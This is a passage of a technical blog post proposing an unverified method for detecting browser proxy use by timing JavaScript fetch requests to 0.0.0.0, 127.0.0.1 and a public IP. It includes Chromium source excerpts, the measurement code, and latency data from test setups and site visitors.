<figcaption>Win 10 with Firefox 95</figcaption>
</figure>
<h4>macOS Monterey with Chrome 97</h4>
<figure>
<img src="https://incolumitas.com/images/montery-chrome-97.png" alt="timing" />
<figcaption>macOS Monterey with Chrome 97</figcaption>
</figure>
<h4>macOS Monterey with Firefox 95</h4>
<figure>
<img src="https://incolumitas.com/images/montery-ff-95.png" alt="timing" />
<figcaption>macOS Monterey with Firefox 95</figcaption>
</figure>Is this a valid method to detect Proxies?2021-11-26T18:46:00+01:002021-11-27T18:46:00+01:00Nikolai Tschachertag:incolumitas.com,2021-11-26:/2021/11/26/is-this-a-valid-method-to-detect-proxies/<p>I (maybe) found another method to detect browsers that route their traffic through SOCKS/HTTP proxies. What do you think? Is this a valid method to detect Proxies? I need your help!</p><p><strong>Please Note:</strong> I was quite hesitant to publish this article, because I don't know exactly how this proxy detection method works (if it works). I need your help to review this, please leave a comment if you know more.</p>
<p><a
class="orange_button"
href="https://bot.incolumitas.com/proxy_detect.html">
Also visit my Proxy/VPN Detection Page
</a></p>
<h2>Introduction</h2>
<p>The goal of this article is to reliably detect proxies using JavaScript (more precisely: by measuring latencies with JavaScript). There are many legitimate reasons for proxy usage, but unfortunately, criminals also tend to camouflage their Internet identity (IP address) by abusing proxies.</p>
<p>I hate to deal with latencies and to derive conclusions from them. It's improper science and it's quite dirty, to be frank. But I fear that there is some truth hidden in latencies and that it must be considered when trying to detect sneaky bots and malicious traffic.</p>
<p>Let's put it this way: Have you ever attempted to browse a website with a proxy? Have you noticed that everything tends to load a bit slower? Probably!</p>
<p>Why should it be impossible to detect this delay and slowness using JavaScript? After all, JavaScript gives us a full programming language with (almost) limitless possibilities!</p>
<p>Looking at latencies is just another side channel that JavaScript gives us. A lot becomes possible when every website is allowed to execute arbitrary (sandboxed) code on client machines.</p>
<figure>
<img src="https://incolumitas.com/images/1024px-Mad_scientist.png" alt="Mad Scientist" width="683px" height="639px" />
<figcaption>Me trying to detect proxies with latencies
<span style="font-size: 70%">(Source: <a href="https://de.wikipedia.org/wiki/Verr%C3%BCckter_Wissenschaftler#/media/Datei:Mad_scientist.svg">https://de.wikipedia.org/wiki/Verr%C3%BCckter_Wissenschaftler#/media/Datei:Mad_scientist.svg</a>)</span>
</figcaption>
</figure>
<p>What do I even mean when I speak of <strong>detecting proxies with latency measurements</strong>?</p>
<p>There are essentially two ways in which bots use proxies in the real world:</p>
<ol>
<li>They make use of the SOCKS protocol. SOCKS5, the latest version of the protocol, is defined in <a href="https://datatracker.ietf.org/doc/html/rfc1928">RFC 1928</a>. This RFC is from March 1996, so it has been around for quite a while. SOCKS allows you to route any connection, either UDP or TCP, through a proxy server.</li>
<li>Then there are HTTP proxies, implemented with the HTTP CONNECT method. This behavior is specified in <a href="https://httpwg.org/specs/rfc7231.html#CONNECT">RFC 7231, 4.3.6. CONNECT</a>.</li>
</ol>
<p>For <a href="https://datatracker.ietf.org/doc/html/rfc1928">RFC 1928</a>, the most important part is:</p>
<blockquote>
<p>When a TCP-based client wishes to establish a connection to an object
that is reachable only via a firewall (such determination is left up
to the implementation), it must open a TCP connection to the
appropriate SOCKS port on the SOCKS server system. The SOCKS service
is conventionally located on TCP port 1080. If the connection
request succeeds, the client enters a negotiation for the authentication method to be used, authenticates with the chosen method, then sends a relay request. The SOCKS server evaluates the
request, and either establishes the appropriate connection or denies
it.</p>
</blockquote>
<p>As you can read above, the SOCKS specification states
that a SOCKS server basically has to glue two TCP streams
together (<em>"sends a relay request"</em>).</p>
<p>For HTTP proxies, the most important part from <a href="https://httpwg.org/specs/rfc7231.html#CONNECT">RFC 7231, 4.3.6. CONNECT</a> reads:</p>
<blockquote>
<p>The CONNECT method requests that the recipient establish a tunnel to the destination origin server identified by the request-target and, if successful, thereafter restrict its behavior to blind forwarding of packets, in both directions, until the tunnel is closed. Tunnels are commonly used to create an end-to-end virtual connection, through one or more proxies, which can then be secured using TLS (Transport Layer Security, [RFC5246]).</p>
</blockquote>
<p><strong>My conclusion:</strong> Each TCP/IP stream, and especially its connection establishment, costs one or more RTTs and thus time. A packet transmitted from host A to host B through two interconnected TCP/IP streams takes more time than a packet flowing through just one TCP channel from host A to host B.</p>
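<p>To make this conclusion concrete, here is a back-of-the-envelope model. It is a simplification under stated assumptions: only the TCP handshakes and the CONNECT exchange are counted, while TLS, DNS and processing time on the proxy are ignored. The function names and the RTT values are invented for illustration.</p>

```javascript
// Rough model: time until a TCP connection to the target is usable.
// All inputs are round-trip times in milliseconds.

// Direct connection: one round trip for the TCP handshake.
function directConnectMs(rttClientTarget) {
  return rttClientTarget;
}

// HTTP CONNECT proxy: TCP handshake with the proxy (1 RTT), then the
// CONNECT request/response (1 RTT), during which the proxy performs its
// own TCP handshake with the target (1 RTT between proxy and target).
function proxiedConnectMs(rttClientProxy, rttProxyTarget) {
  return 2 * rttClientProxy + rttProxyTarget;
}

// Invented example values.
console.log('direct: ', directConnectMs(40));
console.log('proxied:', proxiedConnectMs(30, 30));
```

<p>Even when the proxy sits on a comparably short path, the extra handshake and the CONNECT exchange add up, and this is the kind of gap a latency measurement tries to pick up.</p>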
<h2>The Idea</h2>
<p>The idea I had is quite simple:</p>
<p>I want to measure the RTT/network latency to three different IP addresses:</p>
<ol>
<li>The non-routable meta-address <code>0.0.0.0</code></li>
<li>The IPv4 loopback address <code>127.0.0.1</code></li>
<li>A public reference IP address: an Internet-reachable server, for example <code>167.99.241.135</code></li>
</ol>
<p>The port does not matter here. I chose an arbitrary port that is very likely closed. Of course we cannot be sure that the port is closed, but the likelihood of a service listening on <code>127.0.0.1:43983</code> is rather small.</p>
<p><strong>Conjecture:</strong></p>
<p>If the latency measured with JavaScript to the address <code>0.0.0.0</code> is significantly larger than the latency to
<code>127.0.0.1</code>, the browser might be using a proxy.</p>
<p>Additionally, the latency to <code>0.0.0.0</code> must be in the same range as the latency to <code>167.99.241.135</code>. Otherwise, the collected data is likely invalid.</p>
<h3>Explanation</h3>
<p>But why should the latency to <code>0.0.0.0</code> be significantly larger than the latency to <code>127.0.0.1</code> when we use a proxy?</p>
<p>Honestly, I don't know for sure (!).</p>
<p>According to this <a href="https://news.ycombinator.com/item?id=9048811">Hacker News thread</a>, the IP <code>0.0.0.0</code> should not point to localhost when entered in the Chromium address bar. But according to this <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=428046">Chromium bug tracker discussion</a>, that is exactly what it does:</p>
<blockquote>
<p>Allow explicit navigations to "0.0.0.0" to support systems where this performs a
navigation to localhost (in defiance of specs... but seemingly common).</p>
</blockquote>
<p>We can quickly look into the <a href="https://chromium.googlesource.com/chromium/src/+/65e7a0403eb51c8490ee13e5da3ed8e544c34926/components/omnibox/autocomplete_input.cc">Google Chrome code base autocomplete_input.cc</a> where autocomplete in the Chromium address bar is handled:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/* components/omnibox/autocomplete_input.cc */</span><span class="w"></span>
<span class="c1">// For hostnames that look like IP addresses, distinguish between IPv6</span>
<span class="c1">// addresses, which are basically guaranteed to be navigations, and IPv4</span>
<span class="c1">// addresses, which are much fuzzier.</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">family</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">url</span><span class="o">::</span><span class="n">CanonHostInfo</span><span class="o">::</span><span class="n">IPV6</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">metrics</span><span class="o">::</span><span class="n">OmniboxInputType</span><span class="o">::</span><span class="n">URL</span><span class="p">;</span><span class="w"></span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">family</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">url</span><span class="o">::</span><span class="n">CanonHostInfo</span><span class="o">::</span><span class="n">IPV4</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">// The host may be a real IP address, or something that looks a bit like it</span>
<span class="w"> </span><span class="c1">// (e.g. "1.2" or "3232235521"). We check whether it was convertible to an</span>
<span class="w"> </span><span class="c1">// IP with a non-zero first octet; IPs with first octet zero are "source</span>
<span class="w"> </span><span class="c1">// IPs" and are almost never navigable as destination addresses.</span>
<span class="w"> </span><span class="c1">//</span>
<span class="w"> </span><span class="c1">// The one exception to this is 0.0.0.0; on many systems, attempting to</span>
<span class="w"> </span><span class="c1">// navigate to this IP actually navigates to localhost. To support this</span>
<span class="w"> </span><span class="c1">// case, when the converted IP is 0.0.0.0, we go ahead and run the "did the</span>
<span class="w"> </span><span class="c1">// user actually type four components" test in the conditional below, so</span>
<span class="w"> </span><span class="c1">// that we'll allow explicit attempts to navigate to "0.0.0.0". If the</span>
<span class="w"> </span><span class="c1">// input was anything else (e.g. "0"), we'll fall through to returning QUERY</span>
<span class="w"> </span><span class="c1">// afterwards.</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">||</span><span class="w"></span>
<span class="w"> </span><span class="p">((</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">address</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">// This is theoretically a navigable IP. We have four cases. The first</span>
<span class="w"> </span><span class="c1">// three are:</span>
<span class="w"> </span><span class="c1">// * If the user typed four distinct components, this is an IP for sure.</span>
<span class="w"> </span><span class="c1">// * If the user typed two or three components, this is almost certainly a</span>
<span class="w"> </span><span class="c1">// query, especially for two components (as in "13.5/7.25"), but we'll</span>
<span class="w"> </span><span class="c1">// allow navigation for an explicit scheme or trailing slash below.</span>
<span class="w"> </span><span class="c1">// * If the user typed one component, this is likely a query, but could be</span>
<span class="w"> </span><span class="c1">// a non-dotted-quad version of an IP address.</span>
<span class="w"> </span><span class="c1">// Unfortunately, since we called CanonicalizeHost() on the</span>
<span class="w"> </span><span class="c1">// already-canonicalized host, all of these cases will have been changed</span>
<span class="w"> </span><span class="c1">// to have four components (e.g. 13.2 -> 13.0.0.2), so we have to call</span>
<span class="w"> </span><span class="c1">// CanonicalizeHost() again, this time on the original input, so that we</span>
<span class="w"> </span><span class="c1">// can get the correct number of IP components.</span>
<span class="w"> </span><span class="c1">//</span>
<span class="w"> </span><span class="c1">// The fourth case is that the user typed something ambiguous like ".1.2"</span>
<span class="w"> </span><span class="c1">// that fixup converted to an IP address ("1.0.0.2"). In this case the</span>
<span class="w"> </span><span class="c1">// call to CanonicalizeHost() will return NEUTRAL here. Since it's not</span>
<span class="w"> </span><span class="c1">// clear what the user intended, we fall back to our other heuristics.</span>
<span class="w"> </span><span class="n">net</span><span class="o">::</span><span class="n">CanonicalizeHost</span><span class="p">(</span><span class="n">base</span><span class="o">::</span><span class="n">UTF16ToUTF8</span><span class="p">(</span><span class="n">original_host</span><span class="p">),</span><span class="w"> </span><span class="o">&</span><span class="n">host_info</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">((</span><span class="n">host_info</span><span class="p">.</span><span class="n">family</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">url</span><span class="o">::</span><span class="n">CanonHostInfo</span><span class="o">::</span><span class="n">IPV4</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">host_info</span><span class="p">.</span><span class="n">num_ipv4_components</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">4</span><span class="p">))</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">metrics</span><span class="o">::</span><span class="n">OmniboxInputType</span><span class="o">::</span><span class="n">URL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>The important part from the comment reads:</p>
<blockquote>
<p>The one exception to this is 0.0.0.0; on many systems, attempting to navigate to this IP actually navigates to localhost.</p>
</blockquote>
<p>According to <a href="https://en.wikipedia.org/wiki/0.0.0.0">Wikipedia</a>, the address <code>0.0.0.0</code> has a special meaning in routing contexts:</p>
<blockquote>
<p>In the context of routing tables, a network destination of 0.0.0.0 is used with a network mask of 0 to depict the default route as a destination subnet. This destination is expressed as 0.0.0.0/0 in CIDR notation. It matches all addresses in the IPv4 address space and is present on most hosts, directed towards a local router.</p>
</blockquote>
<p>Maybe when Chrome uses a proxy server, it routes requests going to <code>0.0.0.0</code> through the proxy server, but not requests going to <code>127.0.0.1</code>. This discrepancy could be measurable. Could this be correct? I DON'T KNOW.</p>
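<p>One possible explanation, stated here as an assumption and not verified against the setup in this article: Chromium's proxy documentation describes implicit bypass rules, under which requests to localhost names, loopback addresses such as <code>127.0.0.1</code> and link-local addresses are sent directly even when a proxy is configured. <code>0.0.0.0</code> is not covered by those rules. The sketch below only models that idea. The function name <code>bypassesProxy()</code> is made up, and it handles nothing but IPv4 literals and localhost names.</p>

```javascript
// Sketch of the implicit bypass idea for IPv4 literals and localhost names.
// Assumption: loopback (127.0.0.0/8) and link-local (169.254.0.0/16) hosts
// bypass the proxy; everything else, including 0.0.0.0, does not.
function bypassesProxy(host) {
  if (host === 'localhost' || host.endsWith('.localhost')) return true;

  const match = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!match) return false;

  const octets = match.slice(1).map(Number);
  if (octets.some((octet) => octet > 255)) return false;

  if (octets[0] === 127) return true;                      // loopback
  if (octets[0] === 169 && octets[1] === 254) return true; // link-local
  return false;
}

for (const host of ['127.0.0.1', '0.0.0.0', '167.99.241.135']) {
  console.log(host, bypassesProxy(host) ? 'direct' : 'via proxy');
}
```

<p>If this model matches what the browser does, a request to <code>0.0.0.0</code> would take the detour through the proxy while a request to <code>127.0.0.1</code> would not, which would fit the conjecture.</p>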
<h2>Experimental Setup</h2>
<p>In order to take latency measurements, I used the following JavaScript code (using <code>fetch()</code>):</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">measureImageLatenciesFetch</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">5</span><span class="p">;</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">ts</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="p">(</span><span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">let</span> <span class="nx">fullUrl</span> <span class="o">=</span> <span class="nx">url</span> <span class="o">+</span> <span class="p">(</span><span class="mf">44435</span> <span class="o">+</span> <span class="nx">i</span><span class="p">)</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span> <span class="o">+</span> <span class="s1">'.png'</span><span class="p">;</span>
<span class="nx">fetch</span><span class="p">(</span><span class="nx">fullUrl</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">((</span><span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="p">})</span>
<span class="p">.</span><span class="k">catch</span><span class="p">((</span><span class="nx">err</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="nx">ts</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">ts</span><span class="p">.</span><span class="nx">length</span> <span class="o">===</span> <span class="nx">N</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">ts</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">})();</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">url</span> <span class="k">of</span> <span class="p">[</span><span class="s1">'https://0.0.0.0:'</span><span class="p">,</span> <span class="s1">'https://127.0.0.1:'</span><span class="p">,</span> <span class="s1">'https://167.99.241.135:'</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">measureImageLatenciesFetch</span><span class="p">(</span><span class="nx">url</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">latencies</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="nx">latencies</span><span class="p">)</span>
<span class="p">});</span>
<span class="p">}</span>
</code></pre></div>
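<p>For experimenting outside of a browser, the same measurement can be sketched with an injectable fetch function. This is a variant and not the code used to collect the numbers below: unlike the original, it also records a sample when a request unexpectedly succeeds, so the returned promise always settles. The name <code>measureLatencies()</code> and the <code>options</code> parameter are made up for illustration.</p>

```javascript
// Variant of the measurement with an injectable fetch function.
// Fires n requests in parallel and resolves with the elapsed times in ms.
async function measureLatencies(baseUrl, options = {}) {
  const { n = 5, startPort = 44435, fetchFn = globalThis.fetch } = options;
  const probes = [];
  for (let i = 0; i < n; i++) {
    // Same URL scheme as above: a different port and a cache-busting path.
    const url = baseUrl + (startPort + i) + '/' + Date.now() + '.png';
    const t0 = performance.now();
    // Record the elapsed time whether the request fails (expected for a
    // closed port) or succeeds.
    const stop = () => parseFloat((performance.now() - t0).toFixed(3));
    probes.push(fetchFn(url).then(stop, stop));
  }
  return Promise.all(probes);
}

// Example with a fake fetch that always rejects, like a closed port would.
const refusingFetch = () => Promise.reject(new Error('connection refused'));
measureLatencies('https://127.0.0.1:', { fetchFn: refusingFetch })
  .then((latencies) => console.log(latencies));
```

<p>In a browser, leaving out <code>fetchFn</code> falls back to the global <code>fetch()</code>.</p>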
<h4>No Proxy Server</h4>
<p>When I do <strong>not</strong> use a proxy with my Google Chrome browser, I get the following latencies:</p>
<div class="highlight"><pre><span></span><code>https://0.0.0.0: [21.9, 21.6, 22, 21.6, 21.3]
https://127.0.0.1: [23.4, 22.9, 22.4, 22, 26.3]
https://167.99.241.135: [65.6, 64.3, 75.5, 77.3, 79.8]
</code></pre></div>
<p><strong>Observation:</strong> The <code>0.0.0.0</code> latencies are in the same range as the <code>127.0.0.1</code> latencies.</p>
<h4>With Proxy Server</h4>
<p>However, when I start my Chrome browser with a local forwarding proxy server (which in turn uses a remote SOCKS5 upstream proxy) with the command</p>
<div class="highlight"><pre><span></span><code>chromium-browser --proxy-server<span class="o">=</span>http://localhost:8947 https://incolumitas.com
</code></pre></div>
<p>I obtain the following latencies:</p>
<div class="highlight"><pre><span></span><code>https://127.0.0.1: [36.9, 37, 38.3, 37.9, 37.4]
https://0.0.0.0: [262.6, 264.8, 325.1, 327.2, 330.4]
https://167.99.241.135: [379.2, 407.9, 410.3, 424, 428.8]
</code></pre></div>
<p><strong>Observation:</strong> The <code>0.0.0.0</code> latencies are significantly higher than the <code>127.0.0.1</code> latencies, and they are in the same range as the <code>167.99.241.135</code> latencies.</p>
<h4>With VPN enabled</h4>
<p>And when I use a VPN server (with my Android smartphone and OpenVPN Connect), this is what I obtain:</p>
<div class="highlight"><pre><span></span><code>https://127.0.0.1: [15, 21, 24, 24]
https://0.0.0.0: [18, 18, 24, 24]
https://167.99.241.135: [81, 85, 86, 87]
</code></pre></div>
<p><strong>Observation:</strong> No discrepancy when using a VPN.</p>
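<p>The three observations above can be turned into a simple check. This is a minimal sketch of the conjecture, not a tested detector: the function names are made up, and both thresholds (<code>minRatio</code> and <code>maxPublicFactor</code>) are guesses rather than tuned values.</p>

```javascript
// Median of a list of numbers.
function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Heuristic from the conjecture:
// 1. 0.0.0.0 must be much slower than 127.0.0.1 (at least minRatio times).
// 2. 0.0.0.0 must be in the same range as the public IP (within a factor
//    of maxPublicFactor in either direction).
function looksProxied(zero, loopback, publicIp, minRatio = 3, maxPublicFactor = 4) {
  const z = median(zero);
  const l = median(loopback);
  const p = median(publicIp);
  const zeroMuchSlower = z / l >= minRatio;
  const sameRangeAsPublic = z <= p * maxPublicFactor && p <= z * maxPublicFactor;
  return zeroMuchSlower && sameRangeAsPublic;
}

// The measurements from the three scenarios above.
const noProxy = looksProxied(
  [21.9, 21.6, 22, 21.6, 21.3], [23.4, 22.9, 22.4, 22, 26.3], [65.6, 64.3, 75.5, 77.3, 79.8]);
const withProxy = looksProxied(
  [262.6, 264.8, 325.1, 327.2, 330.4], [36.9, 37, 38.3, 37.9, 37.4], [379.2, 407.9, 410.3, 424, 428.8]);
const withVpn = looksProxied(
  [18, 18, 24, 24], [15, 21, 24, 24], [81, 85, 86, 87]);

console.log({ noProxy, withProxy, withVpn });
```

<p>Medians are used instead of means so that a single outlier does not dominate the comparison.</p>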
<h3>More Data from the real World</h3>
<p>Because I record visitors on my <a href="https://bot.incolumitas.com/proxy_detect.html">Proxy/VPN Detection page</a>, I managed to collect some real-world data to check whether this method works. In most of the cases below, I had sufficient grounds to believe that the visitors were in fact using a proxy, since <a href="https://incolumitas.com/2021/10/16/7-different-ways-to-detect-proxies/">other proxy detection tests</a> indicated proxy usage:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">330.7</span><span class="p">,</span>
<span class="mf">334.4</span><span class="p">,</span>
<span class="mf">339.8</span><span class="p">,</span>
<span class="mf">351.5</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">24</span><span class="p">,</span>
<span class="mf">24.9</span><span class="p">,</span>
<span class="mf">22.4</span><span class="p">,</span>
<span class="mf">21.5</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">525.1</span><span class="p">,</span>
<span class="mf">1145.5</span><span class="p">,</span>
<span class="mf">1161.8</span><span class="p">,</span>
<span class="mf">4161.2</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">320.8</span><span class="p">,</span>
<span class="mf">323.8</span><span class="p">,</span>
<span class="mf">328.5</span><span class="p">,</span>
<span class="mf">331</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">13.8</span><span class="p">,</span>
<span class="mf">14.6</span><span class="p">,</span>
<span class="mf">14.8</span><span class="p">,</span>
<span class="mf">17.5</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">789</span><span class="p">,</span>
<span class="mf">793.7</span><span class="p">,</span>
<span class="mf">796.5</span><span class="p">,</span>
<span class="mf">798.4</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">138.2</span><span class="p">,</span>
<span class="mf">138.5</span><span class="p">,</span>
<span class="mf">143.1</span><span class="p">,</span>
<span class="mf">143.3</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3.6</span><span class="p">,</span>
<span class="mf">3.9</span><span class="p">,</span>
<span class="mf">3.9</span><span class="p">,</span>
<span class="mf">3.9</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">144</span><span class="p">,</span>
<span class="mf">144.2</span><span class="p">,</span>
<span class="mf">144.3</span><span class="p">,</span>
<span class="mf">145.2</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">138.8</span><span class="p">,</span>
<span class="mf">143.5</span><span class="p">,</span>
<span class="mf">144</span><span class="p">,</span>
<span class="mf">144.4</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3.6</span><span class="p">,</span>
<span class="mf">3.8</span><span class="p">,</span>
<span class="mf">3.8</span><span class="p">,</span>
<span class="mf">3.9</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">137.8</span><span class="p">,</span>
<span class="mf">142.8</span><span class="p">,</span>
<span class="mf">143.6</span><span class="p">,</span>
<span class="mf">145.1</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">209.2</span><span class="p">,</span>
<span class="mf">210.3</span><span class="p">,</span>
<span class="mf">251.4</span><span class="p">,</span>
<span class="mf">252</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">4.3</span><span class="p">,</span>
<span class="mf">4.6</span><span class="p">,</span>
<span class="mf">4.7</span><span class="p">,</span>
<span class="mf">4.8</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">351.3</span><span class="p">,</span>
<span class="mf">357.6</span><span class="p">,</span>
<span class="mf">409.9</span><span class="p">,</span>
<span class="mf">410.1</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">646.5</span><span class="p">,</span>
<span class="mf">662.5</span><span class="p">,</span>
<span class="mf">663.1</span><span class="p">,</span>
<span class="mf">665.2</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">4</span><span class="p">,</span>
<span class="mf">4</span><span class="p">,</span>
<span class="mf">4.3</span><span class="p">,</span>
<span class="mf">4.3</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">337.5</span><span class="p">,</span>
<span class="mf">343.9</span><span class="p">,</span>
<span class="mf">350.4</span><span class="p">,</span>
<span class="mf">351.1</span>
<span class="p">],</span>
</code></pre></div>
<h4>Bad Data / Rubbish</h4>
<p>Then again, I sometimes recorded very weird data on otherwise normal browsers. Why are the latencies so huge? I could not find an explanation. At first, I assumed that the JavaScript main thread might be slow, so I removed all other JavaScript code, but I still sometimes got weirdly large latency measurements.</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">5.4</span><span class="p">,</span>
<span class="mf">5.3</span><span class="p">,</span>
<span class="mf">5</span><span class="p">,</span>
<span class="mf">5.1</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2004.4</span><span class="p">,</span>
<span class="mf">2004.3</span><span class="p">,</span>
<span class="mf">2004.7</span><span class="p">,</span>
<span class="mf">2006.4</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3420.8</span><span class="p">,</span>
<span class="mf">3486.6</span><span class="p">,</span>
<span class="mf">3485.6</span><span class="p">,</span>
<span class="mf">3486.5</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3.4</span><span class="p">,</span>
<span class="mf">3.3</span><span class="p">,</span>
<span class="mf">3.2</span><span class="p">,</span>
<span class="mf">3.1</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2017.3</span><span class="p">,</span>
